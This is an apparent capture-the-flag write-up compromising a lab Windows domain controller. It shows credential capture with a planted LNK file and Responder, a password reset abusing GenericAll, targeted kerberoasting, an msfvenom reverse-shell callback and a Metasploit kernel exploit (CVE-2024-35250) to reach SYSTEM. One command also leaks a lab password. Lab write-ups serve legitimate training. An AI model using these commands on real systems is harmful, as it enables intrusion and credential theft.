ShareThePainAD

This Active Directory machine starts off with ZERO CREDENTIALS. So our initial scan shows us normal ports open for a server. We first check SMB to find we have guest auth to a ‘Share’ directory. We have READ,WRITE to the directory. So after uploading a lnk file we capture the hash for bob.ross. Once a bloodhound dump is obtained, we find we have GenericAll to user alice.wonderland. We can do this a couple ways with entail setting a SPN and TargetedKerberoasting or change her password. This user alice.wonderland has access to the box being in Remote Management Users. After poking around some we find a SQL directory at C:\ but no access. Nevertheless, this is a older Windows Machine (Server 2022). Using CVE-2024-35250 to exploit at the kernel level we are able to obtain SYSTEM using msfconsole.

Initial Scan

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 126 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2025-11-23 21:01:32Z)
135/tcp  open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 126
464/tcp  open  kpasswd5?     syn-ack ttl 126
593/tcp  open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 126
3268/tcp open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: hack.smarter0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 126
3389/tcp open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.hack.smarter
| Issuer: commonName=DC01.hack.smarter
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-05T03:46:00
| Not valid after:  2026-03-07T03:46:00
| MD5:   4b40:6c01:63f1:81e4:4f56:64b7:8ef3:4bbc
| SHA-1: 2ad1:c7dc:ab46:ae72:570a:ea85:2192:51cf:1707:3692
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQL7/TDfsBKaJEuIxvqLtNeDANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFEQzAxLmhhY2suc21hcnRlcjAeFw0yNTA5MDUwMzQ2MDBaFw0y
| NjAzMDcwMzQ2MDBaMBwxGjAYBgNVBAMTEURDMDEuaGFjay5zbWFydGVyMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr/z97jkoYVuqCfcPuR2gCVRNgSK+
| MB7v2Nxa64USo34Z8OzT758ox5d7FFrmZSm3A0bvUNtVYjw4qAekjAYNCSCZO1JI
| GVDjieej7jRyApmXOCnV82Pp0pDZuc/v8hg1X1JNeXlI4vgi4cVXIQk2Cg6ljjap
| DRcm2JARZ8gNFvn/VbDTBpipp2nFIENtCM0wwslxI4SGbx8+GisHqOwt0tbelpuL
| JQ+uQPoddL45Fz7uQ/Pp/5nnqmtR/6yAR2jFir3v5/hZ7zycPCTlAocRth6azFW2
| UTke69SByvN+BJdgP2QbyXWcJHwX0GatenQCzht4ZCq0O2CsX9+7+lPKbQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBAAVQZIet+fvKcDwhSGcITFyO7RHjL51Q0aauioSdlow50XVGZ8vW
| ptOhb5GwWmGfo8abmKZO8mqK/SkaNU6pA7zwvBHVUqwWF2bMKyWKMBLOB0VIQaxT
| ZfV0LL8KR3oCs1fuC60rxDF8JIEne9vgL5z+dmgxXd6SZJf1//ZPjmUf7ai3ohtg
| MRq87WZuf2P7m2rZaPcIcyMDM0Zt5MSGr+bD9V2AboDrKh6TYrz4ODkNPUbeGyT/
| q57XlN2ERF6OYCYAGpLdCDxHmAhQhihKbxtnC4vwhUCaXnDUSD2v+9WYbrFmWMNl
| UCJT2ircDq6fnW4O9KJJhg5udslgzhQcT3Y=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-23T21:01:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: HACK
|   NetBIOS_Domain_Name: HACK
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hack.smarter
|   DNS_Computer_Name: DC01.hack.smarter
|   DNS_Tree_Name: hack.smarter
|   Product_Version: 10.0.20348
|_  System_Time: 2025-11-23T21:01:34+00:00
5985/tcp open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 20320/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 13605/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 7253/udp): CLEAN (Timeout)
|   Check 4 (port 64780/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-11-23T21:01:39
|_  start_date: N/A

Adding the hostnames to our hosts file.

SMB

We can check the usual null auth and Guest logins to see if we have access.

konoha# nxc smb hack.smarter -u Guest -p '' --shares
SMB         10.0.21.159     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:False)
SMB         10.0.21.159     445    DC01             [+] hack.smarter\Guest:
SMB         10.0.21.159     445    DC01             [*] Enumerated shares
SMB         10.0.21.159     445    DC01             Share           Permissions     Remark
SMB         10.0.21.159     445    DC01             -----           -----------     ------
SMB         10.0.21.159     445    DC01             ADMIN$                          Remote Admin
SMB         10.0.21.159     445    DC01             C$                              Default share
SMB         10.0.21.159     445    DC01             IPC$            READ            Remote IPC
SMB         10.0.21.159     445    DC01             NETLOGON                        Logon server share
SMB         10.0.21.159     445    DC01             Share           READ,WRITE
SMB         10.0.21.159     445    DC01             SYSVOL                          Logon server share

Which in this case we do, and we have READ,WRITE. SO we can just upload a little lnk file using a module from NetExec.

konoha# nxc smb hack.smarter -u Guest -p '' -M slinky -o SERVER=10.200.21.53 NAME=EVILMElol
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB         10.0.21.159     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:False)
SMB         10.0.21.159     445    DC01             [+] hack.smarter\Guest:
SMB         10.0.21.159     445    DC01             [*] Enumerated shares
SMB         10.0.21.159     445    DC01             Share           Permissions     Remark
SMB         10.0.21.159     445    DC01             -----           -----------     ------
SMB         10.0.21.159     445    DC01             ADMIN$                          Remote Admin
SMB         10.0.21.159     445    DC01             C$                              Default share
SMB         10.0.21.159     445    DC01             IPC$            READ            Remote IPC
SMB         10.0.21.159     445    DC01             NETLOGON                        Logon server share
SMB         10.0.21.159     445    DC01             Share           READ,WRITE
SMB         10.0.21.159     445    DC01             SYSVOL                          Logon server share
SLINKY      10.0.21.159     445    DC01             [+] Found writable share: Share
SLINKY      10.0.21.159     445    DC01             [+] Created LNK file on the Share share

Setting up responder, we are able to capture a hash for bob.ross.

konoha# responder -I tun0 -w
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
<SNIP>
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.0.21.159
[SMB] NTLMv2-SSP Username : HACK\bob.ross
[SMB] NTLMv2-SSP Hash     : bob.ross::HACK:de13d20268eb75c7:<SNIP>:<SNIP>

Sidequest to crack the code

I’ve been using john alot lately, I know hashcat is far more superior, but it works better on a VM then hashcat does.

konoha# john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt bob.ross.hash
bob.ross:<SNIP>:HACK:<SNIP>:<SNIP>:01010000000000000068DBCE8A5CDC01EA1F015C7365CD7E00000000020008004200560053004F0001001E00570049004E002D00310047004D005600530033004B004300390058005A0004003400570049004E002D00310047004D005600530033004B004300390058005A002E004200560053004F002E004C004F00430041004C00030014004200560053004F002E004C004F00430041004C00050014004200560053004F002E004C004F00430041004C00070008000068DBCE8A5CDC0106000400020000000800300030000000000000000100000000200000DCBC15A58118355D3E1B347123254BC6DB985C847FADA324A020982E5BF737430A001000000000000000000000000000000000000900220063006900660073002F00310030002E003200300030002E00320031002E00350033000000000000000000

New Found LAND!!!

With our newly aquired credentials, we can get a bloodhound dump and look at what we have. I’m using bloodyAD to get my dump.

konoha# bloodyAD -v DEBUG -d hack.smarther -u bob.ross -p '<SNIP>' -H dc01.hack.smarter get bloodhound
[*] Connection URL: ldap+ntlm-pw://hack.smarther\bob.ross:<SNIP>@dc01.hack.smarter/?serverip=10.0.21.159
[*] Trying to connect to dc01.hack.smarter...
[*] Connection successful
[+] Connecting to LDAP server
[+] Connected to LDAP serrver
Dumping schema: 2it [00:00, 17.50it/s]
Generating lookuptable: 79it [00:00, 250.85it/s]
Dumping SDs: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 83/83 [00:02<00:00, 32.79it/s]
Dumping domains: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 10.87it/s]
Dumping users: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 173.06it/s]
Dumping computers: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 32.17it/s]
Dumping groups: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 49/49 [00:00<00:00, 995.52it/s]
Dumping GPOs: 100%|██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 68.76it/s]
Dumping OUs: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 33.37it/s]
Dumping Containers: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 19/19 [00:00<00:00, 363.72it/s]
[+] Bloodhound data saved to 20251123T234611_Bloodhound.zip
[+] Found 0 trust

Once uploaded to bloodhound we can check pathes. This shows us we have GenericAll over alice.wonderland.

We can do many things here, but I simply just changed her password. I don’t genuinely like to start off by changing the password, especially on a red-team engagement. (I’ll show targetedKerberoasting as well.)

bloodyAD -v DEBUG -d hack.smarther -u bob.ross -p '<SNIP>' -H dc01.hack.smarter set password alice.wonderland P@ssw0rd
[*] Connection URL: ldap+ntlm-pw://hack.smarther\bob.ross:<SNIP>@dc01.hack.smarter/?serverip=10.0.21.159
[*] Trying to connect to dc01.hack.smarter...
[*] Connection successful
[+] Password changed successfully!

TargetedKerberoasting

First we set a SPN for the user.

konoha# bloodyAD -v DEBUG -d hack.smarther -u bob.ross -p '137Password123!@#' -H dc01.hack.smarter msldap addspn 'CN=alice.wonderland,CN=Users,DC=hack,DC=smarter' cifs/bic
[*] Connection URL: ldap+ntlm-pw://hack.smarther\bob.ross:137Password123%21%40%23@dc01.hack.smarter/?serverip=10.0.21.159
[*] Trying to connect to dc01.hack.smarter...
[*] Connection successful
SPN added!

Then we can just simply targetedkerberoast this user.

konoha# python3 /opt/tools/targetedKerberoast/targetedKerberoast.py -u bob.ross -p '<SNIP>' --dc-ip 10.0.21.159 -d hack.smarter --request-user alice.wonderland
[*] Starting kerberoast attacks
[*] Attacking user (alice.wonderland)
[+] Printing hash for (alice.wonderland)
$krb5tgs$23$*alice.wonderland$HACK.SMARTER$hack.smarter/alice.wonderland*$c0877f710c4a3c59743ba96bd14a75e5$9e865d389a305516264f13644ba1e68dbb216e08e4cf70c31c0320aa53cd4bf2eef18b1c19ddfa3c71583eadb970a35eccdaec0a82c9537d45074af121cd13a1810824b0ff0be45dd8773176420b0055943ded1e96c1e7e4a716a9adfb9b8cb0aed78f8350a0fa2c162c3ca3b6ef6f59ed0236ad215b698bcf55bc84996d9893c7b4d533629ff3d42ea682a63864f9f677a6b4c021bdbe61895bb0296066401bf0b01a354d2b0e1f5b06ec64659c8425c1edd67ef4b1f764eca1af2fec2401002d46f0ef9580d36707f343fa9e3<SNIP>

We can try to crack, if it’s a weak password, perhaps if it doesn’t crack we could then resort to changing the password.

Getting a foot in the door

So starting off not too strong. No privileges for us to use.

konoha# evil-winrm -i dc01.hack.smarter -u alice.wonderland -p 'P@ssw0rd'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
/var/lib/gems/3.3.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Checking the OS, we have Windows Server 2022 Standard.

*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> Get-ComputerInfo


WindowsBuildLabEx                                       : 20348.1.amd64fre.fe_release.210507-1500
WindowsCurrentVersion                                   : 6.3
WindowsEditionId                                        : ServerStandard
WindowsInstallationType                                 : Server
WindowsInstallDateFromRegistry                          : 9/2/2025 9:09:11 PM
WindowsProductId                                        : 00454-10000-00001-AA349
WindowsProductName                                      : Windows Server 2022 Standard

For PrivEsc we can use Metasploit since it’s well equipped with an armory.

PrivEsc

So we can create a shell with msfvenom and continue from there.

konoha# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=32002 -f exe > pga.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7680 bytes

Then setup our listener on msfconsole

msf exploit(windows/local/cve_2024_35250_ks_driver) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) >
msf exploit(multi/handler) > options

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     32002            yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf exploit(multi/handler) > run -j
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.200.21.53:32002

Finally, we can upload and execute.

*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> upload pga.exe
*Evil-WinRM* PS C:\Users\alice.wonderland\Documents> start pga.exe

And back on our machine.

msf exploit(multi/handler) >
[*] Sending stage (230982 bytes) to 10.0.21.159
[*] Meterpreter session 5 opened (10.200.21.53:32002 -> 10.0.21.159:54023) at 2025-11-23 18:57:41 -0600

msf exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getuid
Server username: HACK\alice.wonderland

I bet you already knew about this 😏

Looking for juciy vulnerabilities.

meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.0.21.159 - Collecting local exploits for x64/windows...
[*] Collecting exploit 751 / 2568

After this gave back output, we find that there are many we can try. This kernel exploit worked just perfectly.

msf exploit(windows/local/cve_2024_35250_ks_driver) > run
[*] Started reverse TCP handler on 10.200.21.53:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
[*] Launching notepad to host the exploit...
[*] The notepad path is: C:\Windows\System32\notepad.exe
[*] The notepad pid is: 6704
[*] Reflectively injecting the DLL into 6704...
[*] Sending stage (230982 bytes) to 10.0.21.159
[*] Meterpreter session 4 opened (10.200.21.53:4444 -> 10.0.21.159:51034) at 2025-11-23 16:09:08 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM